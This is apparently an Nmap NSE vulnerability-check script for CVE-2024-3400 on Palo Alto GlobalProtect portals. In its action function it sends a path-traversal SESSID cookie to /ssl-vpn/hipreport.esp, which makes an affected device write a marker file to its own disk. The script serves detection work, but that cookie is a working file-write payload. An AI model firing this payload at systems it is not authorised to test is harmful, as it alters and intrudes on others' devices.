cve-2024-3400_palo.nse
local http = require "http"
local stdnse = require "stdnse"
local shortport = require "shortport"
local string = require "string"
local rand = require "rand"
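-- NSE script metadata.
-- The description text is what Nmap shows in --script-help; it is left as the
-- author wrote it.
description = [[
CVE-2024-3400 - Identificacion de equipos PALO ALTO afectados por esta vulnerabilidad.
]]
author = "Jorge Caballero - CYBERTEMPLAR"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- "vuln" is the NSE category name for vulnerability checks; "vulnerability" is
-- not an NSE category, so `--script vuln` would never select this script.
-- The check sends a crafted SESSID cookie that, on an affected device, makes
-- the device create a file on its own filesystem. A probe that writes to the
-- target does not meet Nmap's definition of "safe", so it is labelled
-- "intrusive" to keep it out of `--script safe` runs against production gear.
categories = {"intrusive", "vuln"}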
-- TODO: add alternative ports.
--- Port rule: run only against ports whose detected service is http or https.
-- Matching is by service name alone; the port number and state are not
-- consulted, so a portal on a port Nmap labels differently is skipped.
-- @param host Nmap host table (unused).
-- @param port Nmap port table; only `port.service` is read.
-- @return true when the service name is "http" or "https", false otherwise.
portrule = function(host, port)
  local service = port.service
  if service == nil then
    return false
  end
  return service == "http" or service == "https"
end
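--- Check a GlobalProtect endpoint for CVE-2024-3400.
-- The probe posts to /ssl-vpn/hipreport.esp with a SESSID cookie that points
-- at a randomly named .txt file under the portal's images directory, then
-- requests that file over HTTP.
--
-- Verdict logic:
--   * 403 on the marker path after the POST is treated as "file now exists",
--     i.e. potentially vulnerable.
--   * 404 means the file was not created and is NOT reported. The earlier
--     version accepted 403 or 404, which flagged any host that answered 200
--     to the POST.
--   * If the marker path already answers 403 before the POST, the 403 signal
--     carries no information and the result is reported as inconclusive.
--
-- Operational note: on an affected device the probe leaves the marker file on
-- disk. Its full path is included in the output so it can be removed and so
-- responders can tell the scan artifact apart from unrelated file-creation
-- evidence on the same device.
--
-- @param host Nmap host table; `host.ip` is used in the report line.
-- @param port Nmap port table, passed through to the http library.
-- @return formatted output on a positive finding; the negative and
--         inconclusive messages go through format_output(false, ...).
action = function(host, port)
  local path = "/ssl-vpn/hipreport.esp"

  -- Random name so repeated scans do not collide with an earlier marker.
  local random_string = rand.random_alpha(8)
  local marker_fs_path = "/var/appweb/sslvpndocs/global-protect/portal/images/" .. random_string .. ".txt"
  local path_check = "/global-protect/portal/images/" .. random_string .. ".txt"
  local bad_cookie = "SESSID=/../../.." .. marker_fs_path .. ";"

  -- Baseline: a server (or WAF) that already returns 403 for this path would
  -- otherwise be reported as vulnerable.
  local baseline = http.get(host, port, path_check)
  if baseline and baseline.status == 403 then
    return stdnse.format_output(false, "No concluyente: la ruta de prueba ya responde 403 antes de la peticion POST.")
  end

  -- Send the POST carrying the crafted session cookie.
  local response = http.post(host, port, path, {
    headers = {
      ["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36",
      ["Content-Type"] = "application/x-www-form-urlencoded",
      ["Cookie"] = bad_cookie
    },
    body = "test_data=test"
  })

  if response and response.status == 200 then
    local check_response = http.get(host, port, path_check)
    -- Only 403 indicates the marker exists; 404 means nothing was written.
    if check_response and check_response.status == 403 then
      return stdnse.format_output(true, {
        "Host (" .. host.ip .. ") Potencialmente vulnerable CVE-2024-3400.",
        "Archivo marcador creado por la prueba: " .. marker_fs_path
      })
    end
  end

  return stdnse.format_output(false, "No se encontro la vulnerabilidad.")
end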